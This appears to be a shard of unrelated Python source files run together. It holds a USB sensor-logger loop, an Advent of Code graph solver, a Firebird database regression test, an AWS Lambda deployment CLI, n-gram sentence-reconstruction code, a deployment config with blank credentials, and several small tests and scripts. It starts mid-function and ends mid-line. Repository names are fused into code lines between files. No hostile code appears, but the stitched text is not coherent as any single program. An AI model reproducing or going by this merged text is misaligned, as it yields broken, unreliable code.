try: device.write(device.outAddress,self.requestBuffer,1000) device.read(device.inAddress,64,1000) device.lastTimeDelete=int(time.time()) except Exception as e: logging.error("Error deleting flash: %s",e) def registerDataListener(self, dataListener): if isinstance(dataListener,DataListener): logging.debug("Registering DataListener %s",type(dataListener).__name__) self.listeners.append(dataListener) def unregisterDataListener(self, dataListener): try: self.listeners.remove(dataListener) except: logging.debug("Unable to deregister DataListener"); # Method checks for the length of device.read(device.inAddress,64,1000). If the length is 10-byte it only containts # the signal strength. If the length is 9-byte it containts Sensor ID, the raw value and the timestamp. (see Protocol.txt) def parseData(self,data): ''' checks if raw data are valid and extracts sensor id, raw value, timestamp and if present signal strength all valid data tuples are returned ''' datapoints=[] pos=-1 logging.debug(data) while pos<63: pos +=1 if data[pos] == 0: continue if data[pos] == 255: # 255 seems to be a end of data marker break; # pos += 25 # continue if (data[pos] == 9 or data[pos] == 10) and pos < 55: # logging.debug("Parser found start mark") sensorid = int.from_bytes([data[pos+1],data[pos+2]], byteorder = 'little', signed=False) rawvalue = int.from_bytes([data[pos+3],data[pos+4]], byteorder = 'big', signed=False) timestamp = int.from_bytes([data[pos+5],data[pos+6],data[pos+7],data[pos+8]], byteorder = 'little', signed=False) signal=None if data[pos] == 10: signal = int.from_bytes([data[pos+9]],byteorder = 'little', signed=False) datapoints.append({'sensorid': sensorid, 'rawvalue': rawvalue, 'timestamp': timestamp+self.TIME_OFFSET, 'signal':signal}) # logging.info("Found Datapoint from sensor %d with value %d" % (sensorid,rawvalue)) pos+=data[pos]-1 continue if (data[pos] == 11 or data[pos] == 12) and pos < 53: sensorid = int.from_bytes([data[pos+1],data[pos+2],data[pos+3],data[pos+4]], byteorder = 'little', signed=False) rawvalue = int.from_bytes([data[pos+5],data[pos+6]], byteorder = 'big', signed=False) timestamp = int.from_bytes([data[pos+7],data[pos+8],data[pos+9],data[pos+10]], byteorder = 'little', signed=False) signal=None if data[pos] == 12: signal = int.from_bytes([data[pos+11]],byteorder = 'little', signed=False) if self.detectUnknownSensors and sensorid not in self.sensors: self.addSensor(sensorid) datapoints.append({'sensorid': sensorid, 'rawvalue': rawvalue, 'timestamp': timestamp+self.TIME_OFFSET, 'signal':signal}) # logging.info("Found Datapoint from sensor %d with value %d" % (sensorid,rawvalue)) pos+=data[pos]-1 continue # logging.debug("Parser: Nothing found at pos %d"%pos) return datapoints # Method to extract the data. It starts by first if any listeners are currently up. # Then checks when was the last time the time has been set on the Logger. # It also resets the internal flash every day. # It prepares the needed buffer message in this case starts the buffer with type-03 (see Protokol.txt). This will trigger # the logger to request the data from the sensors. # The data are then ask back with by reading the Logger buffer rawdata=dev.read(dev.inAddress,64,1000) def loop(self): ''' constantly reads data from TL-X00 devices as long as DataListeners are registered. Stops reading when the last Listener deregisters. ''' self.clearRequestBuffer() while len(self.listeners) > 0: for dev in self.devices: logging.debug("Polling device at Bus %d Address %d Port Number %d" % (dev.bus,dev.address,dev.port_number)) # do time sync every 900 sec if int(time.time()) - dev.lastTimeSync > 900: self.setTime(dev) # delete internal flash every day # todo: make interval configurable or count entries if int(time.time()) - dev.lastTimeDelete > 86400: self.deleteDeviceData(dev) readcount=0 founddata=0 while True: try: logging.debug("write and read data from device") self.clearRequestBuffer() self.requestBuffer[0]=3 dev.write(dev.outAddress, self.requestBuffer,1000) # send request to read the sensors time.sleep(0.01) rawdata=dev.read(dev.inAddress,64,1000) # request the result from logger if rawdata[0]==0 and rawdata[1]==0: # no new data break dev.lastTimeDataRead = int(time.time()) # store new time of new retrieved data datapoints = self.parseData(rawdata) # method to get process buffer data into usable data # notify listeners for datapoint in datapoints: sensorid=str(datapoint["sensorid"]) if sensorid not in self.sensors: detected_sensor=self.detectSensor(sensorid) if detected_sensor != False: if self.validateSensorData(datapoint, detected_sensor): self.addSensor(detected_sensor) if sensorid in self.sensors: sensor=self.sensors[sensorid] if self.validateSensorData(datapoint, sensor): for l in self.listeners: l.onNewData(datapoint, sensor) # invoke method to share new data to the listerners founddata += len(datapoints) readcount += 1 if founddata == 0 and readcount > 5: raise Exception('device gives nonsense data') elif founddata > 0: dev.deviceErrors = 0 # sleep again before polling device time.sleep(0.01) except Exception as e: raise logging.info("Unable to read new data: %s" % e) # logging.debug(traceback.format_exc()) dev.deviceErrors += 1 if dev.deviceErrors > 10 : logging.warn("Too many errors. Removing device on Bus %d Address %d Port Number %d" % (dev.bus,dev.address,dev.port_number)) self.devices.remove(dev) # untested! break # do not busy poll. Sleep one second logging.debug("sleeping") time.sleep(4) if math.floor(time.time()) > self.lastDeviceCheck + 60: logging.debug("Checking for new Devices") if self.checkForNewDevices() : self.findDevices() self.initializeDevices() day07/main.py import re def main(): with open('input') as f: containment_graph = read_containment_graph(f) all_containing_bags = containment_graph.ancestors('shiny gold') print(f'The number of bags that transitively contain shiny gold is {len(all_containing_bags) - 1}') bags_in_shiny_gold = containment_graph.descendants_weight('shiny gold') - 1 print(f'The number of bags you must carry inside your shiny gold bag is {bags_in_shiny_gold}') def read_containment_graph(iterable): graph = Graph() for line in iterable: edges = parse_rule(line.strip()) graph.add_edges(edges) return graph def parse_rule(rule_string): if re.match(r'^([a-z ]+) bags contain no other bags.$', rule_string): return [] match = re.match(r'^([a-z ]+) bags contain ', rule_string) groups = match.groups() src_colour = groups[0] start_index = len(match.group(0)) rule_string = rule_string[start_index:] edges = [] while len(rule_string) > 0: match = re.match(r'^(\d)+ ([a-z ]+) bags?[,.] ?', rule_string) groups = match.groups() count = int(groups[0]) dst_colour = groups[1] edges.append(Edge(src_colour, dst_colour, count)) start_index = len(match.group(0)) rule_string = rule_string[start_index:] return edges class Graph: def __init__(self): self._adjacency = {} self._ancestry = {} self._weights = {} def add_edge(self, edge): forward_neighbours = self._adjacency.setdefault(edge.src, []) forward_neighbours.append(edge.dst) backward_neighbours = self._ancestry.setdefault(edge.dst, []) backward_neighbours.append(edge.src) self._weights[(edge.src, edge.dst)] = edge.weight def add_edges(self, edges): for edge in edges: self.add_edge(edge) def ancestors(self, root): ancestors = set() return self._ancestors(root, ancestors) def _ancestors(self, node, ancestors): if node in ancestors: return ancestors.add(node) direct_ancestors = self._ancestry.get(node, []) for direct_ancestor in direct_ancestors: self._ancestors(direct_ancestor, ancestors) return ancestors def descendants_weight(self, root): visited = set() return self._descendants_weight(root, visited) def _descendants_weight(self, node, visited): direct_descendants = self._adjacency.get(node, []) descendants_weight = 0 for direct_descendant in direct_descendants: descendants_weight += self._weights[(node, direct_descendant)] * self._descendants_weight(direct_descendant, visited) return 1 + descendants_weight class Edge: def __init__(self, src, dst, weight): self.src = src self.dst = dst self.weight = weight def __eq__(self, other): return (self.src == other.src and self.dst == other.dst and self.weight == other.weight) if __name__ == '__main__': main() #coding:utf-8 # # id: bugs.core_3188 # title: page 0 is of wrong type (expected 6, found 1) # decription: # Confirmed on WI-V2.5.0.26074 # exception: # DatabaseError: # Error while commiting transaction: # - SQLCODE: -902 # - database file appears corrupt (C:\\MIX\\FIREBIRD\\QA\\FBT-REPO\\TMP\\BUGS.CORE_3188.FDB) # - wrong page type # - page 0 is of wrong type (expected 6, found 1) # -902 # 335544335 # # New messages in firebird.log in 2.5.0 after running ticket statements: # # CSPROG (Client) Mon Feb 15 07:28:05 2016 # INET/inet_error: connect errno = 10061 # CSPROG Mon Feb 15 07:41:02 2016 # Shutting down the server with 0 active connection(s) to 0 database(s), 1 active service(s) # # tracker_id: CORE-3188 # min_versions: ['2.5.1'] # versions: 2.5.1 # qmid: None import pytest from difflib import unified_diff from firebird.qa import db_factory, python_act, Action # version: 2.5.1 # resources: None substitutions_1 = [] init_script_1 = """""" db_1 = db_factory(sql_dialect=3, init=init_script_1) # test_script_1 #--- # # import os # import difflib # # os.environ["ISC_USER"] = user_name # os.environ["ISC_PASSWORD"] = # # engine = str(db_conn.engine_version) # db_conn.close() # # # #--------------------------------------------- # # def flush_and_close(file_handle): # # https://docs.python.org/2/library/os.html#os.fsync # # If you're starting with a Python file object f, # # first do f.flush(), and # # then do os.fsync(f.fileno()), to ensure that all internal buffers associated with f are written to disk. # global os # # file_handle.flush() # if file_handle.mode not in ('r', 'rb'): # # otherwise: "OSError: [Errno 9] Bad file descriptor"! # os.fsync(file_handle.fileno()) # file_handle.close() # # #-------------------------------------------- # # def cleanup( f_names_list ): # global os # for i in range(len( f_names_list )): # if os.path.isfile( f_names_list[i]): # os.remove( f_names_list[i] ) # if os.path.isfile( f_names_list[i]): # print('ERROR: can not remove file ' + f_names_list[i]) # # #-------------------------------------------- # # def svc_get_fb_log( engine, f_fb_log ): # # import subprocess # # # ::: NB ::: Service call for receive firebird.log works properly only since FB 2.5.2! # # if engine.startswith('2.5'): # get_firebird_log_key='action_get_ib_log' # else: # get_firebird_log_key='action_get_fb_log' # # subprocess.call([ context['fbsvcmgr_path'], # "localhost:service_mgr", # get_firebird_log_key # ], # stdout=f_fb_log, stderr=subprocess.STDOUT # ) # return # # #-------------------------------------------- # # # # Start two attachments: # con1 = kdb.connect(dsn=dsn) # con2 = kdb.connect(dsn=dsn) # # # Session-1: # c1 = con1.cursor() # # # f_fblog_before=open( os.path.join(context['temp_directory'],'tmp_3188_fblog_before.txt'), 'w') # svc_get_fb_log( engine, f_fblog_before ) # flush_and_close( f_fblog_before ) # # c1.execute("create table test(id int primary key)") # con1.commit() # # # Session-2: # # c2 = con2.cursor() # c2.execute('drop table test') # con2.commit() # # # cleanup # con1.close() # con2.close() # # f_fblog_after=open( os.path.join(context['temp_directory'],'tmp_3188_fblog_after.txt'), 'w') # svc_get_fb_log( engine, f_fblog_after ) # flush_and_close( f_fblog_after ) # # # Now we can compare two versions of firebird.log and check their difference. # # oldfb=open(f_fblog_before.name, 'r') # newfb=open(f_fblog_after.name, 'r') # # difftext = ''.join(difflib.unified_diff( # oldfb.readlines(), # newfb.readlines() # )) # oldfb.close() # newfb.close() # # f_diff_txt=open( os.path.join(context['temp_directory'],'tmp_3188_diff.txt'), 'w') # f_diff_txt.write(difftext) # flush_and_close( f_diff_txt ) # # # Difference of firebird.log should be EMPTY: # # with open( f_diff_txt.name,'r') as f: # print( f.read() ) # f.close() # # ############################### # # Cleanup. # cleanup( [i.name for i in (f_fblog_before, f_fblog_after, f_diff_txt)] ) # # #--- act_1 = python_act('db_1', substitutions=substitutions_1) @pytest.mark.version('>=2.5.1') def test_1(act_1: Action): with act_1.connect_server() as srv: srv.info.get_log() log_before = srv.readlines() with act_1.db.connect() as con1, act_1.db.connect() as con2: c1 = con1.cursor() c1.execute("create table test(id int primary key)") con1.commit() # c2 = con2.cursor() c2.execute('drop table test') con2.commit() srv.info.get_log() log_after = srv.readlines() assert list(unified_diff(log_before, log_after)) == [] kilometercreative/Drizzledrz/methods.py import os import json import zipfile import base64 import time from functools import reduce from .command import Command from .aws import config_profile, aws from .helper import DrizzleWrapper, path_to, conflicting_exists, write_replacing, contents_of, zip_into from .errors import DrizzleException # TODO it just doesn't work yet def drizzle_help(pos, named, flags): if len(pos) > 0: print("Retrieving help for %s" % pos[0]) else: print("Commands: ") for c in COMMANDS: print("%s - %s" % (c.name, c.docs()['description'])) def setup(pos, named, flags): p_deploy = path_to(".deploy") p_lib = path_to("lib") p_shared = path_to("shared") p_drizzle = path_to("drizzle.json") if conflicting_exists(p_deploy, p_lib, p_shared, p_drizzle): return os.makedirs(p_deploy) os.makedirs(p_lib) os.makedirs(p_shared) profile = named.get("profile") if not profile: profile = input("AWS Profile Name [default]: ") or "default" region = named.get("region") if not region: region = input("AWS Region [us-west-2]: ") or "us-west-2" config_profile(profile) write_replacing(path_to("drizzle.json", loc="templates"), p_drizzle, replacements={"$profile": profile, "$region": region}) def add(pos, named=None, flags=None): if len(pos) != 1: return print("Usage: drz add ") name = pos[0] role_name = '%s_drizzle' % name p_fun = path_to(name) if conflicting_exists(p_fun): return os.makedirs(p_fun) write_replacing(path_to("config.json", loc="templates"), path_to(name, "config.json"), replacements={"$1": name}) write_replacing(path_to("starter.py", loc="templates"), path_to(name, "__init__.py"), replacements={"$1": name}) iam = aws('iam') role_arn = iam.create_role(RoleName=role_name, AssumeRolePolicyDocument=contents_of(path_to("lambda_trust", loc="templates")) )["Role"]["Arn"] iam.put_role_policy(RoleName=role_name, PolicyName='lambda_logs', PolicyDocument=contents_of(path_to("lambda_policy", loc="templates"))) build([name], None, None) print("Waiting 15 seconds for newly-created role to go live...") time.sleep(15) # wait for IAM role to go live with open(path_to('.deploy/build/%s.zip' % name), 'rb') as bundle: aws('lambda').create_function( FunctionName=name, Runtime='python3.6', Role=role_arn, Handler='%s.lambda_handler' % name, Description='Created by drizzle', Code={'ZipFile': bundle.read()}) def build(pos, named, flags): # Able to run from: # - command line, within function (with or without pos[0] as name) # - project, supplying pos[0] as name of function # if drizzle function if len(pos) > 0: name = pos[0] else: name = os.path.basename(os.getcwd()) os.chdir("..") p_config = path_to(name, "config.json") if not os.path.exists(p_config): raise DrizzleException("Couldn't find config.json for function '%s'" % name) config = DrizzleWrapper("config.json", p_config) # create build folder if it doesn't exist p_build = path_to('.deploy/build') if not os.path.exists(p_build): os.mkdir(p_build) # create build zip bundle = zipfile.ZipFile('.deploy/build/%s.zip' % name, 'w', zipfile.ZIP_DEFLATED) bundle.writestr("BUILD.md", contents_of(path_to("BUILD.md", loc="templates"))) zip_into(bundle, path_to(name), config["exclude"]) zip_into(bundle, path_to("shared"), config["exclude"]) zip_into(bundle, path_to("lib"), config["exclude"], include=config["include"]) bundle.close() def deploy(pos, named, flags): # Able to run from: # - command line, within function (with or without pos[0] as name) # - project, supplying pos[0] as name of function if len(pos) > 0: name = pos[0] else: name = os.path.basename(os.getcwd()) os.chdir("..") build([name], None, None) lam = aws('lambda') with open(path_to('.deploy/build/%s.zip' % name), 'rb') as bundle: lam.update_function_code( FunctionName=name, ZipFile=bundle.read()) with open(path_to(name, 'config.json'), 'r') as config_file: config = json.load(config_file)["aws"] payload = { "FunctionName": config["function-name"], "Handler": config["handler"], "Description": config["description"], "Timeout": config["timeout"], "MemorySize": config["memory-size"], "Environment": config["environment"] } lam.update_function_configuration(**payload) def test(pos, named, flags): # Able to run from: # - command line, within function (with or without pos[0] as name) # - project, supplying pos[0] as name of function if len(pos) > 0: name = pos[0] else: name = os.path.basename(os.getcwd()) os.chdir("..") lam = aws('lambda') p_test = path_to('.deploy', 'tests', '%s.json' % name) if not os.path.exists(p_test): raise DrizzleException("Couldn't find %s.json in .deploy/tests" % name) with open(p_test, 'r') as tests: filtered_tests = "".join(filter(lambda l: not l.startswith("//"), tests.readlines())) results = lam.invoke(FunctionName=name, LogType='Tail', Payload=bytes(filtered_tests, encoding='utf-8')) print("*** RESPONSE ***") print("\n*** STATUS ***") print(results["StatusCode"]) print("\n*** LOGS ***") print(str(base64.b64decode(results['LogResult']), encoding="utf-8")) print("\n*** PAYLOAD ***") print(results["Payload"].read()) # Compile commands into dictionary COMMANDS = [ Command(drizzle_help, "help", "help.json"), Command(setup, "setup", "setup.json", args=["profile", "region"]), Command(add, "add", "add.json"), Command(build, "build", "build.json"), Command(deploy, "deploy", "deploy.json"), Command(test, "test", "test.json"), ] COMMAND_MAP = reduce(lambda acc, c: {**acc, c.name: c}, COMMANDS, {}) # from allImports import * # from app.logic import databaseInterface # from app.logic.getAuthUser import AuthorizedUser # from app.logic.getAll import GetAll # @app.route("/contributors/", methods = ["GET"]) # def contributors(): # # we need to know if the user is authorized to see this # return render_template("snips/nameList.html", # cfg = cfg # ) import itertools from collections import deque, namedtuple from itertools import combinations from typing import Tuple import numpy as np from multiset import Multiset from pathlib import Path from .sentence_reconstruction import ngram_sent_vecs PartialSent = namedtuple("PartialSent", ["multiset", "sent"]) PartialList = namedtuple("PartialList", ["multiset", "trigrams"]) DATA = Path("../data/") MODELS = Path("../models") # def disc(ngram_vecs: np.array): # _, n, d = ngram_vecs.shape # C = 1 / n # output = C * d ** ((n - 1) / 2) * ngram_vecs.prod(axis=1).sum(axis=0, keepdims=True) # return output def disc(ngram_vecs): if ngram_vecs.ndim == 2: # n = 1 _, d = ngram_vecs.shape output = ngram_vecs else: _, n, d = ngram_vecs.shape C = 1 / n # TODO: Check the effect of dtype conversions output = ( C * d ** ((n - 1) / 2) * ngram_vecs.astype(np.float64).prod(axis=1) ).astype(np.float32) return output def gen_bvs_i2b( unigram_sents, bigram_vec_repr, word_vecs, word2index, markers=True, start="▷", end="◁", ): for unigram_sent in unigram_sents: pairs = sorted( set( combinations( set(unigram_sent) | set([start, end]) if markers else set(unigram_sent), 2, ) ) ) # generate vectors that correspond to the candidate bigrams bigram_vecs = np.vstack( ngram_sent_vecs( [[pair] for pair in pairs], bigram_vec_repr, word_vecs, word2index, 2 ) ) index2bigram = dict(enumerate(pairs)) yield (bigram_vecs, index2bigram) return def adjacent(partial_sent: namedtuple, bigram: Tuple, bigram_sent: Multiset): if partial_sent.multiset[bigram] < bigram_sent[bigram]: if partial_sent.sent[-1] == bigram[0]: return PartialSent( multiset=partial_sent.multiset + Multiset([bigram]), sent=partial_sent.sent + [bigram[1]], ) if partial_sent.sent[-1] == bigram[1]: return PartialSent( multiset=partial_sent.multiset + Multiset([bigram]), sent=partial_sent.sent + [bigram[0]], ) return False def adjacent_trigram(partial_list: namedtuple, trigram: Tuple, trigram_sent: Multiset): if partial_list.multiset[trigram] < trigram_sent[trigram]: if len(partial_list.trigrams) == 1: first_trigram = list(partial_list.trigrams)[0] common_words = Multiset(first_trigram) & Multiset(trigram) if len(common_words) == 2: first_word = list(Multiset(first_trigram) - common_words)[0] fourth_word = list(Multiset(trigram) - common_words)[0] return PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, *list(common_words)), (*list(common_words), fourth_word), ], ) elif len(partial_list.trigrams) == 2: first_trigram, second_trigram = partial_list.trigrams first_word = first_trigram[0] second_and_third_words = Multiset(first_trigram[1:]) fourth_word = second_trigram[2] if fourth_word in trigram: third_words = list( second_and_third_words & (Multiset(trigram) - Multiset([fourth_word])) ) if len(third_words) == 1: third_word = third_words[0] second_word = list(second_and_third_words - Multiset([third_word]))[ 0 ] fifth_word = list( Multiset(trigram) - Multiset([third_word, fourth_word]) )[0] return PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, second_word, third_word), (second_word, third_word, fourth_word), (third_word, fourth_word, fifth_word), ], ) elif len(third_words) == 2: third_word1, third_word2 = third_words second_word1 = list( second_and_third_words - Multiset([third_word1]) )[0] second_word2 = list( second_and_third_words - Multiset([third_word2]) )[0] fifth_word1 = list( Multiset(trigram) - Multiset([third_word1, fourth_word]) )[0] fifth_word2 = list( Multiset(trigram) - Multiset([third_word2, fourth_word]) )[0] partial_sent1 = PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, second_word1, third_word1), (second_word1, third_word1, fourth_word), (third_word1, fourth_word, fifth_word1), ], ) partial_sent2 = PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=[ (first_word, second_word2, third_word2), (second_word2, third_word2, fourth_word), (third_word2, fourth_word, fifth_word2), ], ) return [partial_sent1, partial_sent2] else: last_trigram = partial_list.trigrams[-1] if len(Multiset(last_trigram[1:]) & Multiset(trigram)) >= 2: third_last_word, second_last_word = last_trigram[1:] last_word = list(Multiset(trigram) - Multiset(last_trigram[1:]))[0] return PartialList( multiset=partial_list.multiset + Multiset([trigram]), trigrams=partial_list.trigrams + [(third_last_word, second_last_word, last_word)], ) return False def get_candidate_sents(bigram_sent: Multiset, start_token="▷", end_token="◁"): def gen_candidates(start_partial_sents, bigram_sent): # contains lists of enumerated ordered bigrams that could # potentially form sentences. candidates = [] max_len = 0 # length of the longest candidate for start_partial_sent in start_partial_sents: Q = deque([start_partial_sent]) while len(Q) > 0: if len(Q) > 1000: return [] partial_sent = Q.popleft() if len(partial_sent.sent) > max_len: max_len = len(partial_sent.sent) candidates = [partial_sent] if len(partial_sent.sent) == max_len: candidates.append(partial_sent) for bigram in bigram_sent: partial_sent_new = adjacent(partial_sent, bigram, bigram_sent) if partial_sent_new and (partial_sent_new not in Q): Q.append(partial_sent_new) # list( # map( # print, # [ # " ".join(q.sent) # + "\n" # # + "\n".join(map(str, q.multiset.items())) # for q in Q # ], # ) # ) # input() return candidates start_partial_sents = [ PartialSent( multiset=Multiset([bigram]), sent=[bigram[1] if bigram[0] == start_token else bigram[0]], ) for bigram in bigram_sent if start_token in bigram ] candidates = gen_candidates(start_partial_sents, bigram_sent) candidate_sents = [] if candidates: for candidate in candidates: bigram_sent_rest = bigram_sent - candidate.multiset end_partial_sents = [ PartialSent( multiset=Multiset([bigram]), sent=[bigram[1] if bigram[0] == end_token else bigram[0]], ) for bigram in bigram_sent_rest if end_token in bigram ] if not end_partial_sents: candidate_sents.append(candidate.sent) else: candidates_reversed = gen_candidates( end_partial_sents, bigram_sent_rest ) candidate_sents.extend( [ candidate.sent + candidate_reversed.sent[::-1] for candidate_reversed in candidates_reversed ] ) else: end_partial_sents = [ PartialSent( multiset=Multiset([bigram]), sent=[bigram[1] if bigram[0] == end_token else bigram[0]], ) for bigram in bigram_sent if end_token in bigram ] if end_partial_sents: candidates_reversed = gen_candidates(end_partial_sents, bigram_sent) candidate_sents.extend( [ candidate_reversed.sent[::-1] for candidate_reversed in candidates_reversed ] ) # remove markers, and concatenate the words to form # sentences candidate_sents = list( set( tuple( [start_token] + [ word for word in candidate_sent if word not in {start_token, end_token} ] + [end_token] ) for candidate_sent in candidate_sents ) ) return candidate_sents def get_candidate_trigrams(candidate_sents): candidate_trigrams = sorted( set( itertools.chain.from_iterable( ( (candidate_sent[i], candidate_sent[i + 1], candidate_sent[i + 2]) for i in range(len(candidate_sent) - 2) ) for candidate_sent in candidate_sents ) ) ) return candidate_trigrams def get_candidate_sents_trigrams( trigram_sent: Multiset, start_token="▷", end_token="◁" ): def gen_candidates(start_partial_lists, trigram_sent): # contains lists of PartialList objects that could # potentially form sentences. candidates = [] max_len = 0 # length of the longest candidate for start_partial_list in start_partial_lists: Q = deque([start_partial_list]) # with tqdm(total=len(trigram_sent)) as pbar: while len(Q) > 0: if len(Q) > 1000: return [] partial_list = Q.popleft() if len(partial_list.trigrams) > max_len: # pbar.update(len(partial_list.trigrams) - max_len) max_len = len(partial_list.trigrams) candidates = [partial_list] if len(partial_list.trigrams) == max_len: candidates.append(partial_list) for trigram in trigram_sent: result = adjacent_trigram(partial_list, trigram, trigram_sent) if type(result) is list: for partial_list_new in result: if partial_list_new not in Q: Q.append(partial_list_new) # print(Q) # input() elif type(result).__name__ == "PartialList" and (result not in Q): Q.append(result) # print(Q) # input() return candidates start_partial_lists = [ PartialList(multiset=Multiset([trigram]), trigrams=[trigram]) for trigram in trigram_sent if start_token in trigram ] # A list of PartialList objects candidates = gen_candidates(start_partial_lists, trigram_sent) # contains a sentences. May include start or end tokens candidate_sents = [] def gen_sent(trigrams): if trigrams: return list(trigrams[0]) + [trigram[2] for trigram in trigrams[1:]] else: return [] if candidates: for candidate in candidates: partial_sent = gen_sent(candidate.trigrams) trigram_sent_rest = trigram_sent - candidate.multiset end_partial_lists = [ PartialList(multiset=Multiset([trigram]), trigrams=[trigram]) for trigram in trigram_sent_rest if end_token in trigram ] if not end_partial_lists: candidate_sents.append(partial_sent) else: candidates_reversed = gen_candidates( end_partial_lists, trigram_sent_rest ) candidate_sents.extend( [ partial_sent + gen_sent( [ trigram[::-1] for trigram in candidate_reversed.trigrams[::-1] ] ) if partial_sent[-1] != candidate_reversed.trigrams[-1][-1] else partial_sent + gen_sent( [ trigram[::-1] for trigram in candidate_reversed.trigrams[::-1][1:] ] ) for candidate_reversed in candidates_reversed ] ) else: end_partial_lists = [ PartialList(multiset=Multiset([trigram]), trigrams=[trigram]) for trigram in trigram_sent if end_token in trigram ] if end_partial_lists: candidates_reversed = gen_candidates(end_partial_lists, trigram_sent) candidate_sents.extend( [ gen_sent( [trigram[::-1] for trigram in candidate_reversed.trigrams[::-1]] ) for candidate_reversed in candidates_reversed ] ) # remove markers, and concatenate the words to form # sentences candidate_sents = list( set( tuple( word for word in candidate_sent if word not in {start_token, end_token} ) for candidate_sent in candidate_sents ) ) return candidate_sents ######### # Tests # ######### ## adjacent_trigram """ >>> trigram_sent = Multiset( { ("▷", "2", "1"): 1, ("1", "2", "3"): 1, ("3", "2", "1"): 1, ("3", "1", "5"): 1, ("1", "5", "6"): 1, ("5", "6", "7"): 1, ("6", "7", "8"): 1, ("7", "8", "9"): 1, ("8", "9", "◁"): 1, } ) >>> partial_list1 = PartialList(multiset=Multiset([("▷", "2", "1")]), trigrams=[("▷", "2", "1")]) >>> print(partial_list1) PartialList(multiset=Multiset({('▷', '2', '1'): 1}), trigrams=[('▷', '2', '1')]) >>> partial_list2 = adjacent_trigram(partial_list1, ("1", "2", "3"), trigram_sent) >>> print(partial_list2) PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1}), trigrams=[('▷', '2', '1'), ('2', '1', '3')]) >>> partial_list3 = adjacent_trigram(partial_list2, ("3", "2", "1"), trigram_sent) >>> print(partial_list3) [PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1, ('3', '2', '1'): 1}), trigrams=[('▷', '1', '2'), ('1', '2', '3'), ('2', '3', '1')]), PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1, ('3', '2', '1'): 1}), trigrams=[('▷', '2', '1'), ('2', '1', '3'), ('1', '3', '2')])] >>> partial_list4 = adjacent_trigram(partial_list3[0], ("3", "1", "5"), trigram_sent) >>> print(partial_list4) PartialList(multiset=Multiset({('▷', '2', '1'): 1, ('1', '2', '3'): 1, ('3', '2', '1'): 1, '3': 1, '1': 1, '5': 1}), trigrams=[('▷', '1', '2'), ('1', '2', '3'), ('2', '3', '1'), ('3', '1', '5')]) >>> partial_list4 = adjacent_trigram(partial_list3[1], ("3", "1", "5"), trigram_sent) >>> print(partial_list4) False """ ## get_candidate_sents_trigrams # Host url to make the call against HOST_URL = '' PORT = 443 # Represents WS1 _numeric_ organization group-ID TENANT_GROUP_ID = '' # The WS1 REST API tenant code AW_TENANT_CODE = '' # Username and Password to access WS1 REST APIs API_USERNAME = '' API_PASSWORD = '' # List of assignment groups in WS1 UEM for Alpha deployment, enclose the Ids between single quotes ALPHA_GROUPS = [] # List of assignment groups in WS1 UEM for Beta deployment, enclose the Ids between single quotes BETA_GROUPS = [] # List of assignment groups in WS1 UEM for Production deployment, enclose the Ids between single quotes PRODUCTION_GROUPS = [] # POST_SCRIPT_VALIDATION : 1 => When set to 1, after uploading and publishing the product, the script will fetch # the details of the uploaded product and validate: # Product is in Active State # Product is uploaded in the same OG as mentioned in the config file # Product is assigned to the same Smart Groups as mentioned in the config file # : 0 => When set to 0. It will just upload and publish the product. Validations will not be # done. POST_SCRIPT_VALIDATION = 1 # ---------------------------------------------------------------------------------------------------------------------- # Build Server Details # Fill in the following details if this python script needs to be integrated with the build server. # If the build pipeline used is Jenkins, pass the script name "jenkins_build_information.py 1" in place of build number # Build server url where the app build is run BUILD_SERVER_URL = '' # Build project name BUILD_PROJECT_NAME = '' # Username to login to the build server BUILD_SERVER_USERNAME = '' # Password to login to the build server BUILD_SERVER_PASSWORD = ''sarmientoF/grader from setuptools import setup, find_packages setup( name='grader', version='1.0.0', description='Matlab Grader management package', url='/sarmientoF/grader.git', author='', author_email='', license='unlicense', package_dir={"": "lib"}, packages=find_packages("lib"), zip_safe=False, install_requires=[ "GitPython", "lxml", ] ) n_max = 150000 f = [0] * n_max for n in range(2, n_max - 4): if f[n] == 0: f[n::n] = [x + 1 for x in f[n::n]] elif f[n:n + 4] == [4, 4, 4, 4]: ans = n break print(ans) # Copyright Junipyr. All rights reserved. # https://github.com/Junipyrfrom .zip_with import zip_with from ramda.private.asserts import assert_iterables_equal def add(a, b): return a + b def uniq_nocurry_test(): assert_iterables_equal(zip_with(add, [1, 1, 1], [1, 2, 3]), [2, 3, 4]) def take_curry_test(): assert_iterables_equal(zip_with(add)([1, 1, 1], [1, 2, 3]), [2, 3, 4]) ''' HELM classifier library ''' import os, sys import os.path as op import glob import pickle import logging import csv import json from pathlib import Path from tqdm import tqdm import numpy as np import matplotlib.pyplot as plt from sklearn.ensemble import RandomForestClassifier from sklearn import metrics from sklearn.model_selection import GroupKFold from utils.dir_helper import get_batch_subdir, get_exp_subdir IGNORE_FEATS = set(['motility', 'track', 'dataset_name']) def write_metrics(true_Y, pred_Y, prob_Y, batch_outdir, config, prefix=""): """ Writes out classifier metrics. Restricted to binary classification. Only the labels "motile" and "non-motile" are expected, with "motile" as the positive label. Currently writes: - Classification Report - AUC curve plot - Precision-Recall curve plot - Confusion matrix Parameters ---------- true_Y: list List of ground truth labels. In ["motile", "non-motile"]. pred_Y: list List of predicted labels. In ["motile", "non-motile"]. prob_Y: list List of "motile" probabilities. batch_outdir: string Batch output directory. config: dict Configuration read from YAML. prefix: str Prefix to be appended to the output filenames. Useful for specifying train vs test metric output. Defaults to "". """ # Output directory path output_dir = get_batch_subdir("classifier_dir", batch_outdir, config) ### BASIC CLASSIFICATION REPORT report = metrics.classification_report(true_Y, pred_Y) if prefix != "": report_fp = op.join(output_dir, prefix+"_report.txt") else: report_fp = op.join(output_dir, "report.txt") # write to file with open(report_fp, 'w') as f: f.write("Classification Report with threshold {}\n".format(config['classifier']['motility_threshold'])) f.write(report) logging.info(f'Saved motility classification report: {op.join(*Path(report_fp).parts[-2:])}') ### ROC PLOT fpr, tpr, _ = metrics.roc_curve(true_Y, prob_Y, pos_label="motile") # Binarize true labels to 1 for motile, 0 for non-motile binary_true_Y = [1 if x=='motile' else 0 for x in true_Y] # Calculate AUC auc = metrics.roc_auc_score(binary_true_Y, prob_Y) # Plot ROC curve fig, ax = 